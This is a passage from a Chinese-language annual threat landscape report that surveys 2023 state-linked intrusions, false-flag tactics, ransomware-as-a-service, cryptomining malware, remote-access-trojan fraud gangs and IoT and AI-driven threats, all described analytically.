[39],基于全球数十家网络安全企业、研究机构及专家学者的近千份历史研究文献,充分整合各方分析过程及研究成果,力求通过业界和学界的分析实证,努力呈现美相关机构对他国进行网络攻击的情况,揭示网络霸权对全球网络空间秩序构成的重大破坏及严重威胁。《报告》按照时间和事件脉络,共分为13篇,主要包括美国情报机构网络攻击他国关键基础设施,进行无差别网络窃密与监控,植入后门污染标准及供应链源头,开发网络攻击武器并造成泄露,所售商用攻击平台失控而成为黑客利器,干扰和打压正常的国际技术交流与合作,打造符合美国利益的标准及秩序,阻碍全球信息技术发展,制造网络空间的分裂与对抗等。报告以中英文双语发布,在国际国内引发巨大反响。 2023年4月13日,五角大楼“泄密门”事件再次曝光美国窃听包括以色列、日本、韩国在内的重要盟友政府信息、窃听联合国秘书长通信,以及监视其“盟友”乌克兰总统泽连斯基等。 2023年6月1日开始,俄罗斯安全厂商卡巴斯基发布“三角测量行动”系列报告[2],披露了一个潜伏数年的iOS恶意代码及多个iOS系统零日漏洞。对此,俄罗斯联邦安全局(FSB)发布声明指责美苹果公司与NSA“密切合作”,通过复杂的恶意软件入侵了数千部苹果手机[3]。“三角测量行动”利用iOS系统内置的iMessage消息服务和iOS系统零日漏洞实现对苹果设备的“零点击”攻击。攻击者起初利用WebKit内存损坏和字体解析漏洞获取执行权限,随后利用整形溢出漏洞提升得到内核权限,再利用多个内存漏洞突破苹果硬件级的安全防御功能,在设备上执行并植入恶意程序。整个过程完全隐藏,不需要用户执行任何操作。卡巴斯基报告认为[4],面对复杂攻击者,任何保护都可能被突破,依赖“隐晦式安全”(security through obscurity)的系统永远不可能真正安全。6月10日,安天发布报告《“量子”系统击穿苹果手机——方程式组织攻击iOS系统的历史样本分析》[11],公开了对美方依托量子系统,针对手机浏览器进行攻击投放的历史样本分析。 2023年7月26日,武汉市应急管理局发布公开声明称,“武汉市地震监测中心遭受境外组织的网络攻击。部分地震速报数据前端台站采集点网络设备被植入后门程序。”国家计算机病毒应急处理中心和一家国内网络安全厂商联合调查指出[3],已经在受害单位的网络中发现了技术非常复杂的后门恶意软件,符合美国情报机构特征,具有很强的隐蔽性,并且通过恶意软件的功能和受影响的系统判断,攻击者的目的是窃取地震监测相关数据,而且具有明显的军事侦察目的。 2023年10月,Lazarus组织旗下一款跨平台的远程控制框架MATA被发现投入到针对东欧工业公司的网络间谍活动中[4],该框架最早于2019年被发现[7],早期的版本主要表现出针对Windows、Linux、macOS三方跨平台能力,拥有丰富的窃密控制插件以及独特的多层算法通讯加密,足够典型但并无先进性可言。经过5代版本的更新迭代,MATA框架的研发人员明显参考了多年来安全行业针对“五眼联盟”APT攻击能力的技术研究,以及Vault7和“影子经纪人”等泄露的武器装备资料。卡巴斯基报告认为[4],该APT表面看有朝鲜Lazarus组织的痕迹,但复杂的技术和过程以及攻击资源的富有奢侈程度,怀疑背后真正的组织可能是“五眼联盟”。 3.1.2 关键人员手机一直是A2PT攻击组织的重点目标 近些年来,智能手机已经成为人们不可或缺的一部分,智能手机承载着个人通讯、娱乐、工作、学习、社交等多种需求,手机内存储着大量个人工作、生活的数据资料,对很多人来讲手机可能比PC更加重要。同时,手机等智能终端设备具有远超传统PC节点的广泛感知能力,其带有多种传感器(包括用于获取高精度定位的传感器,加速度传感器、重力传感器、陀螺仪和旋转矢量传感器)可用于获取当前设备的高精度即时动态。除了高精度传感器外,还有摄像头、麦克风这种输入输出的硬件采集装置,甚至是基于Wi-Fi、蓝牙模块进行周边环境和设备的扫描和收集。这种特性使得一旦成功入侵手机,就可以将其变成攻击者的图像、声音、位置等专业窃密器。 但长期以来,很多人认为手机系统生态更加安全,一方面认为智能终端系统,出厂即带安全软件和权限管理且软件应用经过市场审核,只要或私自安装软件就能保证安全;另一方面认为以iOS为代表的封闭操作系统,给人以“黑盒”似的安全感,很多用户认为看不到攻击就没有攻击发生。殊不知攻击者有多种入口攻击智能手机,也有多种技术手段将自己潜伏隐藏。 2016年,安天捕获到了美国NSA下属方程式组织针对iOS系统的方程式样本,确定了该木马为方程式组织的DoubleFantasy家族,通过量子系统向iOS投放。相关分析成果安天在今年6月10日公开,并配套绘制了“量子”系统对流量劫持向终端发起攻击的猜想图,如图2-3,依托该系统美方可对全球智能终端设备发起漏洞攻击并植入木马[11]。2021年,英国广播公司(BBC)报道,以色列软件监控公司NSO向一些国家售卖了一款名为“飞马”的手机间谍软件,用以监控各类重点人员甚至他国的相关政要。“飞马”软件可以轻而易举地入侵iOS和Android系统,并轻松截取手机里的各类信息、图片、视频、电邮内容、通话记录,甚至可以秘密开启麦克风进行实时录音。 2023年,俄罗斯安全厂商卡巴斯基发布“三角测量行动”系列报告[2],披露了一个潜伏持续数年的iOS恶意代码及多个iOS系统零日漏洞。卡巴斯基的研究员最初是在流量上发现了异常,在对终端分析的时候面临无法对iOS系统进行全面取证的问题,此时的封闭系统反而成为一个难以有效进行环境分析和取证的劣势。在最新的“三角测量行动”报告结尾[12],卡巴斯基研究员认为“面对复杂攻击者,任何保护都可能被突破,依赖“隐晦式安全”(security through obscurity)的系统永远不可能真正安全。”以上多个案例都说明,智能终端设备并不安全,反而由于其系统和生态特性一旦被攻击可能长期不被发现,当前的手机和智能终端的安全性除依托系统本身还需要更多的安全关注。 图3-2 量子系统可攻击场景图谱化分析 除此之外,安天根据斯诺登曝光资料,梳理了NSA的ANT攻击装备体系,在2008年前后陆续列装的攻击装备体系中用于对移动通讯设备扫描、监控和数据收集的攻击装备,共有15种,约占全部48种已曝光装备的三分之一。 图3‑3 ANT针对移动通讯设备的网络攻击装备(红色框内) 3.1.3 A2PT组织的示范效应导致了其他组织的跟进模仿和军备竞赛 A2PT具有拥有严密的规模建制,掌控体系化的攻击装备研发和攻击资源采集运营,A2PT所研发使用的武器装备通常具备模块化、框架化的架构、可基于可拓展脚本引擎开发、防御软件规避对抗、采用高强度加密算法、支持内核级Rootkit、组件非落地资源化隐藏、VFS虚拟文件系统、隔离网络穿透、量身定制攻击、丰富窃密采集能力等一整套复杂的高阶能力设计,体现出明显的庞大支撑工程体系优势,诸如具备五眼联盟成员国背景的A2PT威胁如“震网”(Stuxnet)、“毒曲”(Duqu)、“火焰”(Flame)、“方程式”(Equation Group)、“索伦之眼”(ProjectSauron)、“瑞晶”(Regin)等大多具备上述先进优势特点。相对于以“影子经纪人”(Shadow Brokers)泄露方程式组织武器库为典型的超级大国网络军备扩散直接造成噩梦般的大面积安全事件,A2PT攻击组织的历史使用的高阶攻击技术近年来被APT组织广泛应用于各自攻击活动中,该趋势所带来的影响则显得更为潜移默化且深远。 2023年10月,Lazarus组织旗下一款跨平台的远程控制框架MATA被发现投入到针对东欧工业公司的网络间谍活动中[4],该框架最早于2019年被发现[5],早期的版本主要体现有针对Windows、Linux、macOS三方跨平台能力[6],拥有丰富的窃密控制插件以及独特的多层算法通讯加密,足够典型但并无先进性可言。经过5代版本的更新迭代,MATA框架的研发人员明显参考了多年来安全行业针对“五眼联盟”APT攻击能力的技术研究,以及Vault7和“影子经纪人”等泄露的武器装备资料,例如MATA框架的C2通讯过程采用TTLV(Type-Tag-Length-Value)数据编码格式、多层协议和有限状态机(FSM)握手机制,该技术早期曾被Lambert和方程式组织的多款武器中使用;MATA攻击过程中使用自带易受攻击的驱动程序(BYOVD)技术访问系统内核干扰EDR软件的检测响应,该技术也曾被Lambert组织使用;MATA后门支持主动连接/被动激活的组合模式,该类后门启用模式被方程式组织的EQUATIONVECTOR、STRAITBIZARE和Lamberts组织的GoldLambert装备广泛使用;MATA组件支持通过感染可移动存储设备中的软件程序试图针对隔离网络发起攻击,而利用摆渡攻击策略突破隔离网基本是震网、Fanny、索伦之眼等经典A2PT攻击的标配能力。卡巴斯基报告认为,该APT表面看有朝鲜Lazarus组织的痕迹,但复杂的技术和过程以及攻击资源的富有奢侈程度,怀疑有可能是“五眼联盟”APT。 3.1.4 APT组织借鉴开源情报以“假旗”信标隐蔽攻击行为 在网络安全领域中“假旗”(False Flag)是一种十分常见的攻击行为隐蔽策略,通常水平相对高超的攻击者会刻意在攻击流程中的资源预置、抵近突破、驻留潜伏、控制致效等阶段中埋设虚假信息,例如留下语言、位置、身份等信息掩盖来源方向,也可以是散布挖矿、勒索、银行木马等常规威胁来掩盖致效意图,也可能是复用独家武器工具、特征代码数据、过期基础设施,复现独家漏洞、作战技术具体实现、作战战术路径、软件编码风格等,将攻击行为痕迹指向其他具体的已知威胁行为体。“假旗”策略的具体实现不论是设定位置还是栽赃对象,在数量方面通常来说都是宜少不宜多,宜精从简,能造成一定追踪分析成本代价往往能增加更好的效果,而当前业内十余年大量的公开APT研究资料也成为了攻击组织“假旗”构思的重要参考来源。下图举例了海莲花组织的“假旗”仿冒手段。 图3‑4 2023年海莲花组织的“假旗”栽赃手段 2022-2023年,APT29组织频繁采用鱼叉式钓鱼邮件投递附件包裹的模式,通过诱导受害者执行包裹中的快捷方式调动其他白加黑组件序列,多层加载解密在仅内存中运行如CobaltStrike、RatelC4等红队工具的远控载荷,此类攻击的活动范围基本限于欧美地区的政治军事目标,且数量众多反复被主流厂商分析曝光;2023年全年,安天多次在我国重要政企单位发现类似的攻击模式,且在涉及的攻击技战术、武器工具和基础设施中也发现多处曾被公开曝光的APT28、APT29组织特征痕迹。例如初始阶段加载器的解密密钥与2022年已曝光的APT29活动完全一致[7];投递阶段的加载器组件模仿了2018年APT28组织Zebrocy加载器所用的信息窃密和隐藏窗口执行代码,以及ADS流数据存储技术和相同特征参数[8],深入分析发现攻击者目的仅是执行自定义的加载器代码来调用其他模块;投递阶段的注入器组件静态看与2018年已曝光的APT28组织Zebrocy远控完全一致[9]。深入分析发现是攻击者篡改劫持了Zebrocy旧样本的代码流程,转而执行样本资源节中隐藏的远控载荷;最终控制阶段的远控载荷使用特定破解版本的CobaltStrike,该版本的水印数值已知被APT29、TrickBot、SmokeLoader等威胁组织经常使用,相关C2基础设施配套的数字证书的使用者信息字段还包含典型的Wellmess组织特征[10]。上述多处特征痕迹显得有几分刻意,安天基本认定是属于攻击者制造遗留的“假旗”,且分析判定表明攻击活动涉及的组织背景实际疑似为海莲花组织,攻击者此举纯粹是尝试误导溯源调查方向,并未采集利用“假旗”中仿造的其他威胁组织工具手段的执行结果。 3.1.5 地缘冲突的网络战中伴随大量的黑客行动主义活动 巴以冲突是今年新爆发的地缘安全热点。巴以冲突爆发前,中东方面就有伊朗背景的多个APT组织Agrius、APT35、MuddyWater、OilRig持续地将以色列关键基础设施等行业作为打击目标、也有长期以来支持巴勒斯坦情报收集的APT组织TA402[13]。在巴以冲突爆发后与哈马斯有关联的WildCard组织[14]尝试修改TTPs(包括C2从Google Drive转向OneDrive、SysJoker样本从C++到Rust语言的变化)针对以色列进行新一轮攻击等具有战略意志的APT活动,但受限于自身技术以及美国、以色列众多网络安全厂商的频繁曝光,总体来看这些APT组织具有广泛的情报收集能力(CNE)但其针对定向性目标的IT技术网络攻击能力(CNA)运用不足。同样作为地缘安全热点激化的网络冲突,在俄乌冲突中占主导作用的网络攻击行为主要是俄、乌、北约等国家行为体实施的作战行动,以军事系统、关键信息基础设施为目标,通过入侵突防、恶意代码植入,获取长期控制权,实现持续信息窃取,并可瘫痪、干扰关键系统运行。期间虽然也有大量民间黑客组织基于自身立场战队宣誓,但这些活动的象征意义居多。巴以冲突是实力完全非对等但纠葛更复杂的冲突,国家、民族、宗教等地缘安全背景更加复杂,以色列情报机构有极强的攻击能力,始终对周边国家进行攻击渗透,网空情报能力是其战略情报能力的重要支撑。但巴方本身并没有特别成熟的信息基础设施和网空作业力量。基本上是大量民间行为体和以方间的一场混战。而且,为报复对以色列的支持,新加坡、日本、意大利在内的目标都遭到攻击,风险快速外溢。 相对平衡的黑客组织势力站队不同,巴以冲突中,巴方并没有,大多数民间组织站到了同情巴方一侧。在巴以冲突爆发后,包括亲巴勒斯坦的黑客组织和亲以色列的黑客组织在社交媒体中不断宣扬着黑客行动主义,属于典型的非国家行为体受意识形态驱动的黑客组织行为体活动。但媒体大肆宣传的“巴以冲突网络战”,对实际冲突进程影响甚微,其效果远弱于网空认知战。与俄乌冲突网络战进行对比,巴以冲突中出现的DDoS、擦除性恶意代码也不是仿照俄乌冲突的“抄作业”行为,与俄乌网络战中出现的国家行为体攻击活动不同,巴以冲突更多的出现的是黑客主义行为体。巴以冲突的网络战作业模式、致效结果都与俄乌冲突存在明显差异。第一点,从冲突爆发的地缘政治背景考虑,俄乌网络战中攻击的目标基本是一致的、有组织有计划的网络攻击,而在巴以冲突中,多个不同的黑客组织缺少协调工作和明确的目标,多数是打击报复行为,例如入侵包括新加坡、日本、意大利在内的目标针对其支持以色列进行报复。第二点,从国家行为体背景和网络战实际影响考虑,俄乌网络战活动中存在着多个国家背景的行为体并且可以联合Trickbot等黑客组织发起的网络攻击活动产生了实际的影响,为现实冲突赢得了先机。 而据称与哈马斯有关联的黑客团队Storm-1133虽然声称入侵以色列国防部网站窃取数据,但其网络攻击活动对现实冲突产生的影响有限。第三点,从攻击意图考虑,巴以冲突中的激进的黑客行动主义活动试图在短期内制造更多的影响,俄乌冲突则是在地缘政治背景下长期持续性的网络攻击活动。从整体的中东局势观察,包括伊朗、叙利亚、以色列等国在内的网络攻击活动不断,例如2023年12月18日伊朗加油站疑似遭到以色列黑客网络攻击。越来越多的黑客行动主义将随着巴以“火药桶”的引爆在网络空间针对关键基础设施带来威胁、影响牵动中东各国敏感神经。 3.2 勒索攻击与其他的网络黑产犯罪活动的动向 3.2.1 勒索攻击采用定向+RaaS的组合模式,形成“定向勒索+窃密+曝光+售卖”链条作业 3.2.1.1 具备“APT”水平的定向勒索攻击已趋于常态 在当前网络安全舞台上,定向勒索攻击已经成为一种极为普遍且极具威胁性的攻击形式。在2019年[14]和2020年[15]的安天年报中,我们指出了勒索攻击组织在目标选择方面更趋向于有针对性,专注于对有价值攻击目标的定向勒索。在2021年[16]的安天年报中,我们评估了定向勒索攻击的能力已经达到了“高级持续性威胁”(APT)水平。当前这种攻击方式不再仅仅是网络空间的短暂风波,而是已经深刻融入了现代威胁景观的主流。定向勒索攻击是一种专门针对特定目标的网络攻击,其目的在于通过威胁受害者,迫使其支付赎金。攻击者通过深入的目标分析和侦察,有选择性地攻击关键的系统、数据或信息,迫使受害者在支付高昂赎金或面临数据泄露等威胁的情况下做出抉择。 回顾2023年,大型企业频繁成为定向勒索攻击的目标,如英国皇家邮政、日本名古屋港口和波音公司等都面临了不同程度的威胁。波音公司遭受勒索攻击是一起基于Lockbit勒索攻击组织所提供的RaaS基础设施的针对知名企业的定向勒索攻击事件。攻击者以ADC网络边界设备为初始突防点,把握了相关设备在出现漏洞后未及时响应带来的机会窗口,在相关漏洞利用代码出现后,实现了第一时间发掘利用,以此实现凭证窃取。之后利用凭证完成进一步的横向移动和向场景中按需投放的落地能力。攻击组织运用了大量开源和商用工具作为实现不同功能的攻击组件,并通过突破域控等关键主机,实现进一步的凭证权限窃取实现准确和有效投放,窃取了所攻陷主机的相关数据,实现了勒索软件部署。 通常情况下,大型企业在网络架构上通常部署了相应的网络安全防护设施,足以抵御非定向广泛攻击。然而,当面对定向勒索攻击时,企业的网络安全体系显得相对薄弱,因为这类攻击的实施者实质上具备了APT的水平,并将其与勒索软件相结合,对抗能力已经远远超越了单个防护产品的极限,尤其是终端防护系统等产品的防御范围。同时,定向勒索攻击的威胁程度逐渐升级,攻击者的工具和手段也在不断演进。随着勒索软件即服务(RaaS)的崛起,即便是缺乏高深技术水平的个体也能够轻松购买和使用专业的勒索工具,进一步扩大了定向勒索攻击的范围。攻击者不再局限于技术精湛的专业团队,而是包括更广泛的参与者,这使得定向勒索攻击呈现更为多样化的特征。综合来看,当前具备“APT”水平的定向勒索攻击已趋于常态。 3.2.1.2 愈发成熟的勒索即服务模式使勒索攻击 网络犯罪的商业化趋势推动威胁行为者不断提升威胁行为的复杂程度。类似于正常供应链,这些行为者在网络犯罪供应链的特定领域内表现出熟练的专业知识,使得整个行业呈现出高效运作的趋势。网络犯罪行业采用了“即服务”(RaaS)的商业模式,极大地提高了实施网络犯罪的便捷性;即使是相对不成熟的威胁行为者也能轻松获取高级工具和服务。这一趋势使得网络犯罪的从业者能够更迅速、便捷地进行攻击,从而对网络安全形成更大的挑战。 RaaS模式的广泛应用推动了众多勒索软件组织的兴起,勒索攻击事件层出不穷,包括BlackCat、Clop和LockBit等组织,其中LockBit更是成为全球最活跃的勒索攻击组织之一。勒索攻击组织通过RaaS模式吸纳附属成员,附属成员则通过初始访问经纪人(IAB)建立初始访问权限,实现各自专业领域的细化运作。RaaS运营方专注于改进和更新其恶意软件,而附属成员和IAB负责开发和优化渗透系统的方法。“Gold Melody”是一支以经济为动机的IAB黑客组织 [17],又名Prophet Spider或UNC961。该组织通过多种手段入侵目标系统,窃取凭证后进行出售,供勒索攻击组织实施有针对性的攻击。 网络犯罪商业化推动威胁行为者提升攻击复杂度,形成专业化和高效运作趋势。采用“即服务”商业模式使实施网络犯罪更便捷,即便是没有任何技术技能的行为者也能通过点击网页生成窃密勒索工具。这将是全球数字化时代面临的一场难以终结的噩梦。 3.2.1.3 勒索攻击组织利用漏洞武器化进行高效突防 在当前网络威胁不断升级的背景下,将漏洞武器化以实现对攻击目标的入侵已成为勒索软件最为有效的攻击手段之一。根据美国网络安全基础设施安全机构CISA的统计数据,截至2023年12月25日,已有1053个漏洞被用于网络攻击[18],其中有212个漏洞明确被用于勒索攻击,这些漏洞涉及Microsoft、QNAP、VMware、Accellion、Citrix和MOVEit等。在面对企业部署的网络安全防护设施时,攻击者可能难以通过传统手段攻破防线,但通过武器化未修补的漏洞作为突防工具,攻击者可以绕过安全检测和身份验证,轻松实施恶意行为。 2023年初,安全研究人员在打印管理软件PaperCut中发现了两个漏洞[19],分别是CVE-2023-27350和CVE-2023-27351。多个勒索攻击组织利用这些漏洞成功入侵PaperCut供应链,随后向供应链下游用户投放勒索软件,包括Clop、LockBit和Bloody等勒索攻击组织。在同年5月,Clop勒索攻击组织借助文件传输软件MOVEit的漏洞CVE-2023-34362[20],展开大规模的勒索攻击活动。这次攻击导致众多MOVEit软件用户成为Clop的受害者。攻击者充分利用该漏洞,成功突破目标系统的防线,实施了“窃密+加密”操作,并公开了658家企业因此次勒索攻击活动而受害的信息。而在10月,LockBit勒索攻击组织则利用Citrix的漏洞CVE-2023-4966[21],即Citrix Bleed,将波音公司列为受害者之一。本事件用于突防的CVE-2023-4966漏洞的利用代码(POC)10月26日在Github上出现,27日攻击者宣布入侵波音成功。我们倾向攻击发生在POC代码公开后。Citrix 已于10月10日修复,但波音等机构并未进行修补。这反映出攻击者对漏洞资源的运用效率和敏感性远胜于防御方。这一系列事件凸显出漏洞利用在供应链攻击和大规模勒索活动中的危害性,漏洞武器化已然成为勒索攻击组织突破防御的有效抓手。 由于攻击者能熟练使用网络空间测绘引擎的等开源情报,并长期关注积累对重要信息目标的暴露面,因此在POC代码出现后,会有一大批攻击者快速匹配寻找可突防目标。从漏洞的角度看,此前关于0day-1day-Nday的概念,更多还是建立在漏洞发布或公开的时点上,但POC代码被公开,则更是其中需要高度关注的节点,其意味着利用难度瞬间降低,攻击活动的高峰会迅速到来。安天CERT把类似攻击称为1Exp攻击。由于RaaS+定向勒索本身又构成了一种“众筹犯罪”模型,导致关注不同目标资源或拥有目标信息资源的大量攻击者,都可能在发现机会窗口时尽可能的将机会窗口转化为实际收益。 3.2.1.4 勒索攻击形成“定向勒索+窃密+曝光+售卖”链条作业 从波音遭遇勒索攻击事件分析复盘报告中可以看出,目前勒索软件的RaaS模式不仅仅是提供技术基础设施,而是结合宣传炒作、曝光窃取数据、拍卖窃取数据、将受害人举报到监管机构等方式对受害人实施压力,并制造新闻热点,提升品牌效应,从而以滚雪球方式让勒索组织形成臭名昭著的品牌效应。定向勒索模式针对高价值目标,RaaS的附属成员通过各种方式,包括购买0Day漏洞、研发高级恶意代码、收买企业内鬼和情报等手段提高突防能力,提升勒索载荷落地成功率。这种定向+RaaS的组合模式,形成“定向勒索+窃密+曝光+售卖”链条作业,胁迫受害者支付赎金从而实现获利。 3.2.2 挖矿木马使用内核级工具与SHC加密提升隐蔽性和检测难度 3.2.2.1 内核级工具使挖矿木马更加难以检测 2023年,安天CERT监测到多款挖矿木马使用Rootkit内核级工具,如yayaya Miner[23]、TeamTNT[24]和"8220"[25]等。Rootkit内核级工具之所以受到青睐,主要是因为它们能够在系统的最底层进行潜伏,从而提供更深层次的隐蔽性和控制力。这些工具能够直达操作系统的核心,加载恶意的内核模块,以实现无法被传统安全软件检测到的状态。它们可以有效地隐藏恶意进程和文件,由于这些工具对系统的高级控制,即便是系统重启,它们也能够持续在后台运行,确保持续的挖矿活动不受干扰。随着挖矿木马攻击者对利润的不断追求,结合Rootkit技术的挖矿木马将变得越来越复杂。它们不仅仅满足于利用受害者的计算资源,更可能进行更为深入的网络渗透,对网内其他终端造成潜在威胁。 3.2.2.2 SHC加密脚本促使挖矿木马更加隐蔽 2023年,安天CERT对监测到的挖矿木马进行了梳理,发现挖矿木马攻击者为了逃避安全检测,开始采用各种混淆和加密技术来隐藏其恶意代码。其中,使用Shell脚本编译器(SHC)对脚本进行加密的做法愈发流行,SHC成为了攻击者新的工具选择,以增强其挖矿脚本的隐蔽性。SHC是一种将Shell脚本加密成二进制可执行文件的工具,它可以有效地隐藏脚本的源代码,从而使得分析人员难以直接查看代码内容。这种加密不仅可以防止脚本源代码被分析,还可以绕过基于签名的检测机制,因为每次加密后生成的二进制文件都具有不同的签名。安天CERT在2023年先后分析了Hoze[26]、yayaya Miner和Diicot[27]等挖矿木马,均利用SHC加密的脚本发起初始攻击,这种攻击方式为挖矿木马的传播提供了便利,增加了用户系统被感染的风险。 3.2.3 利用远控木马实施诈骗的黑产威胁活动频繁 2023年,来自黑产团伙的威胁呈现出手段不断变化和资源快速更换等特点。以2023年最活跃的黑产团伙“游蛇”为例,其针对我国国内用户进行的网络钓鱼攻击和诈骗活动,规模较大且持续时间较长,对企业造成了一定的经济损失。这类黑产团伙传播的恶意程序变种多、免杀更新速度快、基础设施更换频繁、攻击目标涉及行业领域广泛。从攻击手段看,以“白加黑”加载恶意载荷、内存执行Shellcode、内存解密载荷文件为主,并且最终投放远控木马载荷。安天CERT将具有上述特点的黑产团伙统称为“游蛇”。 3.2.3.1 通过多种途径传播恶意文件投放远控木马 “游蛇”黑产团伙通过即时通讯软件、搜索引擎恶意推广、钓鱼邮件等多种途径传播恶意文件。在利用微信、企业微信等即时通讯软件传播恶意程序的场景下,攻击者会向目标用户投递伪装成文档的恶意文件,并利用话术诱导用户执行;在利用搜索引擎传播恶意程序的场景下,黑产团伙将恶意文件伪装成各种常用软件的安装包,在搜索引擎中恶意推广其搭建的钓鱼下载站,导致用户误下载和执行经过伪装的恶意文件;在利用钓鱼邮件传播恶意文件的场景下,黑产团伙会向攻击目标发送“发票”、“传票”相关主题及内容的钓鱼邮件,在邮件正文中添加指向仿冒票据服务、税务机关的钓鱼网站链接,并在仿冒的钓鱼网站中放置恶意文件。 相较于后两种传播途径,使用即时通讯软件传播恶意文件时需要更多的人力及时间成本,因此黑产团伙通过“代理人”在境外社交软件中创建群组,以按单结算的方式招收大量“投毒手”,传授其各类钓鱼话术,再由“投毒手”通过网推、网聊、地推等方式对多种行业领域的攻击目标分发恶意文件,并诱导目标用户执行。黑产团伙构建以自身为上游、以“代理人”为中游、以“投毒手”为下游的三级结构,实现了恶意文件的大范围传播,由此形成了一种通过即时通讯软件投放远控木马的运营模式[28]。 3.2.3.2 采用开源远控木马并频繁更新免杀手段 黑产团伙频繁更新免杀手段,与安全产品进行持续性的对抗,常使用的手段有“白加黑”加载恶意载荷、内存执行Shellcode、内存解密载荷等,并重点对恶意利用的白程序、加解密方式及关键的加密载荷进行更换。为了绕过安全产品的常规检测,黑产团伙通常会将编写好的Shellcode保存至文本文件中,通过其投放的加载器读取文本中的内容,在内存中执行Shellcode,利用Shellcode进行多层的解密操作,最终在内存中加载执行远控木马载荷。这种攻击方式增加了远控木马执行的隐蔽性,使安全产品不断面临新的挑战。 在远控木马方面,黑产团伙直接选用成熟的开源远控木马代码进行二次开发,目前已发现的有Gh0st远控木马及其变种、winos、AsyncRAT、DCRAT、SiMayRAT等。这些远控木马由受控端和控制端两部分组成,被植入受害主机中的受控端会收集主机中的各类信息,包括系统基本信息、窗口信息、安全产品信息等,以此构造上线包发送至C2服务器,从而与控制端建立通信,并通常采用自定义算法对通信内容进行加解密。此外,这些远控木马能够接收远程控制指令并执行相应的功能,通常支持以下载执行插件的形式扩展其功能模块。攻击者能够通过控制端程序查看受控端上线信息、对受控端屏幕进行监控、对受控端进行系统文件管理以及对受控端进行远程控制。 3.2.3.3 利用远程控制即时通讯软件和伪装身份对目标用户实施诈骗 在2023年的攻击活动中,黑产团伙将社工手段与诈骗套路相结合,在植入远控木马后,黑产团伙主要控制受害者主机中的微信、企业微信等即时通讯软件开展后续的攻击活动。黑产团伙根据行业、身份、职位等因素对受害者进行筛选及分类,并针对不同类别的目标用户群体采取不同的后续攻击方式[29]。 由于黑产团伙的主要目的在于牟取经济利益,因此从事金融相关行业的人员以及各公司的财务人员是黑产团伙的重点攻击目标。针对此类目标群体,黑产团伙主要通过远控木马对受害主机进行远程控制,根据受害者微信通讯录中的备注信息,将某领导的真实微信号删除,再添加一个与该领导相同头像、名称的伪装微信号,并利用该伪装微信号逐步诱导受害者进行转账,以此完成诈骗活动。攻击者也会利用其中的聊天记录获取有关受害者及其相关联系人的更多信息,从而更加真实地伪装成某一身份。 针对电商客服、企业客服以及其他各类店铺的联系人,黑产团伙主要将受害者微信或企业微信号添加进事先创建好的群组中,将其好友添加至该群组中后移除受害者账号。由于此类人员添加的好友大多是其客户,因此黑产团伙会对其创建的群组进行相应的伪装,并对群组中的用户实施集中诈骗。黑产团伙会在群组中通过发送红包或者小额反利等方式降低用户的戒备心,进一步诱导用户加入大群或添加所谓接待员的微信,以此进行层层筛选,并诱导最终筛选出的目标进行转账。 3.3 脆弱性的泛化趋势 在2013年,安天用恶意代码泛化(Malware/Other)一词表示安全威胁向智能设备、物联网等新领域的演进,此后“泛化”一直是安天研究的重要威胁趋势。泛化意味着攻击者的攻击目标不再局限于手机、电脑等传统智能设备,智能家居、工业物联网、关键基础设施等智能技术加持的新领域也都是攻击者积极利用的目标。 《物联网新型基础设施标准体系建设指南(2023版)》(征求意见稿)[37] 指出,到2025年,物联网新型基础设施标准体系基本建立。新制定国家标准和行业标准30项以上、参与制定国际标准10项以上,为推动物联网发展提供有力支持。国家也出台多项政策鼓励应用物联网技术来促进生产生活和社会管理方式向智能化、精细化、网络化方向转变。 但物联网高速发展的背后也隐含着不可小觑的安全风险。与2022年相比,全球范围内针对物联网设备的恶意软件攻击呈现高速增长的趋势,其中制造业尤为突出,这主要是因为制造业严重依赖于物联网与OT系统。IT与OT的进一步融合,在提升系统运营效率的同时,也带来了漏洞管理难度加大、供应链安全风险上升及攻击面扩大等一系列严峻的安全问题。 此外,物联网设备持有量逐年递增,整合了IoT技术的摄像头、无线AP在各类组织、企业中随处可见。但由于管理和使用上的缺陷,比如未更改初始密码、默认开启telnet远程登录功能、向互联网开放管理权限、部署后缺乏漏洞管理、没有或者无法及时更新补丁等问题,使得攻击者能够利用此类设备构建物联网僵尸网络,从而发起DDoS攻击或进行其他恶意活动。例如,2023年11月,InfectedSlurs僵尸网络利用两个具有远程代码执行功能的漏洞感染使用默认凭据的路由器与录像机。相比于传统的僵尸网络,物联网僵尸网络能够形成最高可达1-2Tbps的流量峰值,且在设备规模上比传统僵尸网络更加庞大。 人工智能技术的快速发展为社会带来了正面影响,但同时也要警惕人工智能驱动的网络犯罪威胁也在不断增加。人工智能具有学习和优化能力,这意味着它可以从大量数据中分析出个体的特征、偏好和行为模式,从而有针对性地实施社会工程学攻击,并从每次攻击结果中学习,不断优化攻击策略,提高了欺骗受害者的可能性。基于深度伪造技术,人工智能也可以创建高度逼真的个人音频和视频,通过伪造他人身份散播谣言、损害声誉,甚至是进行犯罪活动。例如,2023年8月,攻击者通过深度伪造技术冒充软件开发公司Retool的员工,以自身账户出现问题为由诱骗受害者提供多重身份验证(MFA)代码,并最终导致该公司27名客户的账户信息泄露。 在日益加剧的全球威胁背景下,关键基础设施也面临着来自多方面的网络攻击威胁,成为网络攻击重点目标。在网络战中,攻击者通过对此类设施发起攻击,造成电力、网络、医疗等系统的大规模瘫痪,严重影响了社会的正常运转。例如,2023年12月,意大利云服务提供商Westpole遭受Lockbit3.0勒索软件攻击,造成了多达540个城市的1300多个公共管理部门服务瘫痪,一些城市被迫恢复人工操作以提供服务。此外,关键基础设施的数字化转型也增加了其遭受攻击的风险。许多组织在防御纵深构建、暴露面管理、远程访问管理、主机系统安全、漏洞响应以及员工安全意识等高优先级领域存在防范短板,可以被攻击者利用。攻击者还普遍通过,渗透攻击上游软硬件供应链的方式,提前获得攻击优势。总之,从其中一环渗透至关键系统中,给整个系统带来了安全隐患。防御投入的不足、防御能力的低下、防御面存在敞口,防御不能覆盖全生命周期等,等都为攻击者提供了可乘之机。在复杂多变的国际局势下,我国关键基础设施面临的风险严峻升级,需要做好迎接风高浪急甚至惊涛骇浪的准备。 当前,安全威胁泛化已经成为常态。安天依然采用与前几年年报中发布“网络安全威胁泛化与分布”一样的方式,以一张新的图表来说明2023年威胁泛化的形势。 3.4 网络安全风险全面转化为数据和业务风险 现今数据已经是组织的重要资产之一。大量的数据存储,给人工智能提供了生长环境,AI让全球看到了海量数据由量变产生质变的憧憬画面,数据资产的价值得到空前提高。然而有光明的一面就有阴影,一些组织存储的高价值的数据资产成为了攻击者的目标,勒索攻击伴随着数据泄露的风险,利用高危漏洞引发的数据泄露造成的影响也不容小觑,政治因素引发的数据泄露甚至能影响国际形势。 3.4.1 数据泄露损失创历史新高 